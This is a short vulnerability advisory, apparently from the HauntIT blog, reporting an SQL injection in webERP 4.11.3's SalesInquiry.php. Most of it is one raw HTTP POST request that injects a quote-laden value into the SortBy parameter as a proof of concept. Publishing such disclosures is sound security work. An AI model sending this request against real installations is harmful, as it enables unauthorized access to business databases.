webERP 4.11.3 SQL Injection

`# ==============================================================  
# Title ...| SQL Injection in webERP  
# Version .| 4.11.3   
# Date ....| 28.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://www.weberp.org  
# ==============================================================  
  
  
# ==============================================================  
# SQL Injection  
  
---<request>---  
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 391  
  
FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry  
---<request>---  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
`